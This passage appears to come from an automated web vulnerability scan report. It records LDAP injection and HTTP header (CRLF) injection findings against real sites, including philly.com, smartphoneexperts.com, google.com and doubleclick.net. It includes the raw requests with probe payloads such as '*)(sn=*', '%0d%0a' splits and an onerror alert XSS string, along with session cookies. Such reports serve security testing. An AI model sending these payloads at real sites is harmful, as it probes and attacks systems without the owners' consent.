om&v22=9%3A00AM&c23=philly%3Anews%3Anation_world&v23=Weekday&c28=New&c29=http%3A//www.philly.com/philly/news/nation_world/121548659.html&c30=logged%20out&c33=flash%2010&c35=silverlight%204.0&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=967&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.philly.com
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_ria=flash%2010%7Csilverlight%204.0; undefined_s=First%20Visit; s_nr=1305033090598

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 10 May 2011 14:19:08 GMT
Server: Omniture DC/2.0.0
Content-Length: 454
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /53d4c597f94350b7)(sn=*/ss/phillycom/1/H.17/s67586282941047 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Omniture DC/2.0.0 Server at metrics.philly.com Port 80</address>
</body></html>

Request 2

GET /53d4c597f94350b7)!(sn=*/ss/phillycom/1/H.17/s67586282941047?AQB=1&ndh=1&t=10/4/2011%208%3A11%3A30%202%20300&vmt=498F4D30&ns=phillycom&pageName=article%3A%20news%3A%20Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win%20-%2005/10/2011&g=http%3A//www.philly.com/philly/news/nation_world/121548659.html&cc=USD&ch=news&server=www.philly.com&events=event1%2Cevent4&c1=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&h1=philly%2Cnews%2Cnation_world%2Cindex&v2=article%3A%20news%3A%20Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win%20-%2005/10/2011&h2=philly%2Cphilly%2Cnews%2Cnation_world%2Cindex&c3=Article&v3=news&c4=Inquirer%20Unknown&v4=philly%2Cnews%2Cnation_world%2Cindex&c5=philly%2Cnews%2Cnation_world%2Cindex&v6=First%20Visit&c8=Tuesday&c9=9%3A00AM&c10=Weekday&c11=121548659&v11=www.philly.com&c12=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&v12=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&v13=a&v15=121548659&v16=Article&v17=http%3A//www.philly.com/philly/news/nation_world/121548659.html&v18=logged%20out&c21=First%20Visit&v21=Tuesday&c22=www.philly.com&v22=9%3A00AM&c23=philly%3Anews%3Anation_world&v23=Weekday&c28=New&c29=http%3A//www.philly.com/philly/news/nation_world/121548659.html&c30=logged%20out&c33=flash%2010&c35=silverlight%204.0&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=967&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.philly.com
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_ria=flash%2010%7Csilverlight%204.0; undefined_s=First%20Visit; s_nr=1305033090598

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 10 May 2011 14:19:09 GMT
Server: Omniture DC/2.0.0
xserver: www639
Content-Length: 0
Content-Type: text/html


2.6. https://secure.smartphoneexperts.com/content/customercare/page-status.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://secure.smartphoneexperts.com
Path:   /content/customercare/page-status.htm

Issue detail

The REST URL parameter 3 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

POST /content/customercare/*)(sn=* HTTP/1.1
Host: secure.smartphoneexperts.com
Connection: keep-alive
Referer: https://secure.smartphoneexperts.com/content/customercare/page-status.htm?store_id_secure=15&d=1317&ab_testing_session_serialized=
Cache-Control: max-age=0
Origin: https://secure.smartphoneexperts.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2v4he5hjga328e0btuv0u9apu5; store_id_secure=15; visitor_id=7bafa0a9256e3f802a19af1811a6ef80; cookie_treo_model=1317; device_id_history=1317; __utmz=1.1305036217.1.1.utmcsr=store.androidcentral.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/customercare/index.htm; __utmv=1.store.androidcentral.com; __utma=1.1567419967161159700.1305036217.1305036217.1305036217.1; __utmc=1; __utmb=1.6.10.1305036217
Content-Length: 69

data_process=billing&order_id=&zip_code=&process=login&I2.x=79&I2.y=5

Response 1

HTTP/1.1 200 OK
Server: spe
Date: Tue, 10 May 2011 14:10:58 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 64921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<span class='customer_testimonials'>&quot;Thanks again for your excellent customer care - I will be back to shop with your company again, without a doubt.&quot;<br />
- Matthew, TX
</span>
</div>
<div class='sidebar-fot'></div>
</div>
</div> <!-- content END -->
</div> <!-- container END -->
</div> <!-- container-wrapper END -->
</div> <!-- background END -->
<div class='footer-wrapper'>
<div class='footer'>
<p>Copyright &copy 1999-2011 <a class='text_small' href='http://www.smartphoneexperts.com'>Smartphone Experts</a>. All rights reserved.
<a class='text_small' href='http://store.androidcentral.com/content/customercare/page-privacy.htm'>Privacy Policy</a>.
       <a class='text_small' href='http://store.androidcentral.com/motorola-droid-x-accessories.htm'>Motorola Droid X Accessories</a>.
   <p><I>Android and the Android Logo are trademarks or registered trademarks of Google, Inc. in the United States and other countries.</p>
</div>
</div>
</div> <!-- background-wrapper END -->
<script type='text/javascript'>
jQuery(function() {
   var url = window.location.href;url = url.substr(url.lastIndexOf("/") + 1);
   if (url!='') $('.header-menu1').find("a[href*='" + url + "']").addClass('active');
});
</script>

<script type='text/javascript'>
jQuery(function() {

// Clue Tip
   $('a.tips').cluetip();
   $('a.tips_cart:eq(0)').cluetip({
       width:340
   });
});

// Content Slider
try {
   featuredcontentglider.init({
       gliderid: 'fader', //ID of main glider container
       contentclass: 'fader-content', //Shared CSS class name of each glider content
       togglerid: 'fader-toggle', //ID of toggler container
       remotecontent: '', //Get gliding contents from external file on server? 'filename' or '' to disable
       selected: 0, //Default selected content index (0=1st)
       persiststate: false, //Remember last content shown within browser session (true/false)?
       speed: 500, //Glide animation duration (in milliseconds)
       autorotate: true, //Auto rotate contents (true/false)?
       autorotateconfig: [5000,500] //if auto rotate en
...[SNIP]...

Request 2

POST /content/customercare/*)!(sn=* HTTP/1.1
Host: secure.smartphoneexperts.com
Connection: keep-alive
Referer: https://secure.smartphoneexperts.com/content/customercare/page-status.htm?store_id_secure=15&d=1317&ab_testing_session_serialized=
Cache-Control: max-age=0
Origin: https://secure.smartphoneexperts.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2v4he5hjga328e0btuv0u9apu5; store_id_secure=15; visitor_id=7bafa0a9256e3f802a19af1811a6ef80; cookie_treo_model=1317; device_id_history=1317; __utmz=1.1305036217.1.1.utmcsr=store.androidcentral.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/customercare/index.htm; __utmv=1.store.androidcentral.com; __utma=1.1567419967161159700.1305036217.1305036217.1305036217.1; __utmc=1; __utmb=1.6.10.1305036217
Content-Length: 69

data_process=billing&order_id=&zip_code=&process=login&I2.x=79&I2.y=5

Response 2

HTTP/1.1 200 OK
Server: spe
Date: Tue, 10 May 2011 14:10:58 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 64947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<span class='customer_testimonials'>&quot;You are the most customer service friendly site I have bought from in months. I am going to enjoy ordering supplies from you in the future.&quot;<br />
- Joseph, VA
</span>
</div>
<div class='sidebar-fot'></div>
</div>
</div> <!-- content END -->
</div> <!-- container END -->
</div> <!-- container-wrapper END -->
</div> <!-- background END -->
<div class='footer-wrapper'>
<div class='footer'>
<p>Copyright &copy 1999-2011 <a class='text_small' href='http://www.smartphoneexperts.com'>Smartphone Experts</a>. All rights reserved.
<a class='text_small' href='http://store.androidcentral.com/content/customercare/page-privacy.htm'>Privacy Policy</a>.
       <a class='text_small' href='http://store.androidcentral.com/motorola-droid-x-accessories.htm'>Motorola Droid X Accessories</a>.
   <p><I>Android and the Android Logo are trademarks or registered trademarks of Google, Inc. in the United States and other countries.</p>
</div>
</div>
</div> <!-- background-wrapper END -->
<script type='text/javascript'>
jQuery(function() {
   var url = window.location.href;url = url.substr(url.lastIndexOf("/") + 1);
   if (url!='') $('.header-menu1').find("a[href*='" + url + "']").addClass('active');
});
</script>

<script type='text/javascript'>
jQuery(function() {

// Clue Tip
   $('a.tips').cluetip();
   $('a.tips_cart:eq(0)').cluetip({
       width:340
   });
});

// Content Slider
try {
   featuredcontentglider.init({
       gliderid: 'fader', //ID of main glider container
       contentclass: 'fader-content', //Shared CSS class name of each glider content
       togglerid: 'fader-toggle', //ID of toggler container
       remotecontent: '', //Get gliding contents from external file on server? 'filename' or '' to disable
       selected: 0, //Default selected content index (0=1st)
       persiststate: false, //Remember last content shown within browser session (true/false)?
       speed: 500, //Glide animation duration (in milliseconds)
       autorotate: true, //Auto rotate contents (true/false)?
       autorotateconfig: [5000
...[SNIP]...

2.7. http://www.google.com/uds/GnewsSearch [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.google.com
Path:   /uds/GnewsSearch

Issue detail

The sig parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the sig parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /uds/GnewsSearch?callback=google.search.NewsSearch.RawCompletion&context=0&rsz=small&hl=en&gss=.com&sig=*)(sn=*&q=rick%20santorum&key=internal-zeitgeist&v=1.0&nocache=1305033071811 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=rick+santorum&date=2011-5-10&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=aQQFw_m5MgodDdHJ1xVbKTCbuualenKfe8EiKcwMEGKFPqWsF0-4XtTZsPXY9cXQIj1W8o_Jqj5uAaJQPmNYlIVf6mB-ckZkZlODBxKm5uH1Nl9YbBSq68wtGrbU0m5F

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Tue, 10 May 2011 13:15:33 GMT
Content-Type: text/javascript; charset=utf-8
X-Backend-Content-Length: 13035
X-Embedded-Status: 200
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 11626

google.search.NewsSearch.RawCompletion('0', {"results":[{"GsearchResultClass":"GnewsSearch","clusterUrl":"http://news.google.com/news/story?ncl\u003ddVOF1zm7u7feiNMJWLE_5O7d-AFxM\u0026hl\u003den\u0026
...[SNIP]...
u003dT\u0026ct\u003dus/0-0-0\u0026fd\u003dS\u0026url\u003dhttp://www.historiccity.com/2011/staugustine/news/florida/lincoln-reagan-day-celebrated-weeks-14454\u0026cid\u003d17593892923622\u0026ei\u003ddTrJTYi4JJvo4AGThey6AQ\u0026usg\u003dAFQjCNFV2Bm3BmsZcnlXnv_dmgR2jN6jSQ","language":"en","image":{"url":"http://static.guim.co.uk/sys-images/Guardian/Pix/red/blue_pics/2011/05/09/hermancain_460x276.jpg","tbUrl":"http://nt2.ggpht.com/news/tbn/QmqXc78UCr4J","originalContextUrl":"http://www.guardian.co.uk/commentisfree/cifamerica/2011/may/09/herman-cain-republicans-2012","publisher":"The Guardian","tbWidth":80,"tbHeight":48},"relatedStories":[{"unescapedUrl":"http://www.catholic.org/politics/story.php?id\u003d41352","url":"http%3A%2F%2Fwww.catholic.org%2Fpolitics%2Fstory.php%3Fid%3D41352","title":"Campaign 2012, South Carolina, \u003cb\u003eRick Santorum\u003c/b\u003e and the Kentucky Derby","titleNoFormatting":"Campaign 2012, South Carolina, Rick Santorum and the Kentucky Derby","location":"","publisher":"Catholic Online","publishedDate":"Mon, 09 May 2011 13:38:24 -0700","signedRedirectUrl":"http://news.google.com/news/url?sa\u003dT\u0026ct\u003dus/0-0-1\u0026fd\u003dS\u0026url\u003dhttp://www.catholic.org/politics/story.php%3Fid%3D41352\u0026cid\u003d17593892923622\u0026ei\u003ddTrJTYi4JJvo4AGThey6AQ\u0026usg\u003dAFQjCNG-asSc3MItQHzEeDxo3X8rt2C9mw","language":"en"},{"unescapedUrl":"http://www.philly.com/philly/news/nation_world/121548659.html","url":"http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html","title":"\u003cb\u003eSantorum\u003c/b\u003e goes to dinner and comes up with a win | Philadelphia Inquirer | 2011 \u003cb\u003e...\u003c/b\u003e","titleNoFormatting":"Santorum goes to dinner and comes up with a win | Philadelphia Inquirer | 2011 ...","location":"","publisher":"Philadelphia Inquirer","publishedDate":"Tue, 10 May 2011 00:15:50 -0700","signedRedirectUrl":"http://news.google.com/news/url?sa\u003dT\u0026ct\u003dus/0-0-2\u0026fd\u003dS\u0026url\u003dhttp://www.philly.com/philly/news/nation_world/121548659.html\u0026cid\u003d17593892923622\u0026ei\u003ddTrJTYi4JJvo4AGThey6AQ\u0026usg\u003dAFQjCNEW5awmdDbyS5K44e7qFQU5sKhDOg","language"
...[SNIP]...

Request 2

GET /uds/GnewsSearch?callback=google.search.NewsSearch.RawCompletion&context=0&rsz=small&hl=en&gss=.com&sig=*)!(sn=*&q=rick%20santorum&key=internal-zeitgeist&v=1.0&nocache=1305033071811 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=rick+santorum&date=2011-5-10&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=aQQFw_m5MgodDdHJ1xVbKTCbuualenKfe8EiKcwMEGKFPqWsF0-4XtTZsPXY9cXQIj1W8o_Jqj5uAaJQPmNYlIVf6mB-ckZkZlODBxKm5uH1Nl9YbBSq68wtGrbU0m5F

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Tue, 10 May 2011 13:15:34 GMT
Content-Type: text/javascript; charset=utf-8
X-Backend-Content-Length: 13110
X-Embedded-Status: 200
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 11604

google.search.NewsSearch.RawCompletion('0', {"results":[{"GsearchResultClass":"GnewsSearch","clusterUrl":"http://news.google.com/news/story?ncl\u003ddVOF1zm7u7feiNMJWLE_5O7d-AFxM\u0026hl\u003den\u0026
...[SNIP]...
u003dT\u0026ct\u003dus/0-0-0\u0026fd\u003dS\u0026url\u003dhttp://www.historiccity.com/2011/staugustine/news/florida/lincoln-reagan-day-celebrated-weeks-14454\u0026cid\u003d17593892923622\u0026ei\u003ddjrJTZDQKYiy4QHS3JEW\u0026usg\u003dAFQjCNFIG_eEZ63WAnuMui53lyPy6cVBDQ","language":"en","image":{"url":"http://static.guim.co.uk/sys-images/Guardian/Pix/red/blue_pics/2011/05/09/hermancain_460x276.jpg","tbUrl":"http://nt2.ggpht.com/news/tbn/QmqXc78UCr4J","originalContextUrl":"http://www.guardian.co.uk/commentisfree/cifamerica/2011/may/09/herman-cain-republicans-2012","publisher":"The Guardian","tbWidth":80,"tbHeight":48},"relatedStories":[{"unescapedUrl":"http://www.catholic.org/politics/story.php?id\u003d41352","url":"http%3A%2F%2Fwww.catholic.org%2Fpolitics%2Fstory.php%3Fid%3D41352","title":"Campaign 2012, South Carolina, \u003cb\u003eRick Santorum\u003c/b\u003e and the Kentucky Derby","titleNoFormatting":"Campaign 2012, South Carolina, Rick Santorum and the Kentucky Derby","location":"","publisher":"Catholic Online","publishedDate":"Mon, 09 May 2011 13:38:24 -0700","signedRedirectUrl":"http://news.google.com/news/url?sa\u003dT\u0026ct\u003dus/0-0-1\u0026fd\u003dS\u0026url\u003dhttp://www.catholic.org/politics/story.php%3Fid%3D41352\u0026cid\u003d17593892923622\u0026ei\u003ddjrJTZDQKYiy4QHS3JEW\u0026usg\u003dAFQjCNGNswtTd2d6H0pwA9rr9BlmH0BE1Q","language":"en"},{"unescapedUrl":"http://www.philly.com/philly/news/nation_world/121548659.html","url":"http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html","title":"\u003cb\u003eSantorum\u003c/b\u003e goes to dinner and comes up with a win | Philadelphia Inquirer | 2011 \u003cb\u003e...\u003c/b\u003e","titleNoFormatting":"Santorum goes to dinner and comes up with a win | Philadelphia Inquirer | 2011 ...","location":"","publisher":"Philadelphia Inquirer","publishedDate":"Tue, 10 May 2011 00:15:50 -0700","signedRedirectUrl":"http://news.google.com/news/url?sa\u003dT\u0026ct\u003dus/0-0-2\u0026fd\u003dS\u0026url\u003dhttp://www.philly.com/philly/news/nation_world/121548659.html\u0026cid\u003d17593892923622\u0026ei\u003ddjrJTZDQKYiy4QHS3JEW\u0026usg\u003dAFQjCNEJXRApr4I_c9dhmt09Y2chtzWirg","language":"en"}
...[SNIP]...

3. HTTP header injection  previous  next
There are 48 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://ad.doubleclick.net/N6496/adj/gather.com/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /N6496/adj/gather.com/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 53a62%0d%0a763681015b6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /53a62%0d%0a763681015b6/adj/gather.com/;tile=1;sz=728x90;ord=9449814500592618;qcseg=D;? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/53a62
763681015b6
/adj/gather.com/;tile=1;sz=728x90;ord=9449814500592618;qcseg=D;:
Date: Tue, 10 May 2011 14:11:31 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://ad.doubleclick.net/N6496/adj/gather.com/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /N6496/adj/gather.com/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 44005%0d%0a76d46cccbc5 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /N6496/44005%0d%0a76d46cccbc5/gather.com/;groupname=politics;kw=politics,rick+santorum,debra+burlingame,bin+laden,obama,2012,eric+holder,cia,;adSense=yes;tile=4;sz=468x60;ord=699316430836916;qcseg=D;qcseg=T;qcseg=4078;qcseg=4077;qcseg=4076;qcseg=4075;qcseg=4072;qcseg=4071;qcseg=4067;? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://politics.gather.com/viewArticle.action?articleId=281474979309848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/44005
76d46cccbc5
/gather.com/;groupname=politics;kw=politics,rick santorum,debra burlingame,bin laden,obama,2012,eric holder,cia,;adSense=yes;tile=4;sz=468x60;ord=699316430836916;qcseg=D;qcseg=T;qcseg=4078;qcseg=4077;qcseg=4076;qcseg=4075;qcseg=4072;qcseg=4071;qcseg=4067;:
Date: Tue, 10 May 2011 13:20:07 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.3. http://ad.doubleclick.net/ad/N3671.277003.NETSHELTER/B5398653.20 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3671.277003.NETSHELTER/B5398653.20

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5c8a0%0d%0ac9145ac5983 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5c8a0%0d%0ac9145ac5983/N3671.277003.NETSHELTER/B5398653.20;sz=1x1;pc=[TPAS_ID];ord=[timestamp]?882012667832896100 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5c8a0
c9145ac5983
/N3671.277003.NETSHELTER/B5398653.20;sz=1x1;pc=[TPAS_ID];ord=[timestamp]:
Date: Tue, 10 May 2011 13:48:20 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.4. http://ad.doubleclick.net/ad/N4478.netshelter.netOX2611/B5176383.13 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N4478.netshelter.netOX2611/B5176383.13

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8b32f%0d%0a53cbf34ed88 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8b32f%0d%0a53cbf34ed88/N4478.netshelter.netOX2611/B5176383.13;sz=1x1;pc=[TPAS_ID];ord=1305033278925? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/samsung-galaxy-tab-10-1-hands-on-at-google-io-2011-09151027/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8b32f
53cbf34ed88
/N4478.netshelter.netOX2611/B5176383.13;sz=1x1;pc=[TPAS_ID];ord=1305033278925:
Date: Tue, 10 May 2011 13:38:52 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.5. http://ad.doubleclick.net/ad/N5371.131643.MEEBO.COM/B5369958.2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N5371.131643.MEEBO.COM/B5369958.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1fe5f%0d%0a152986ec65b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

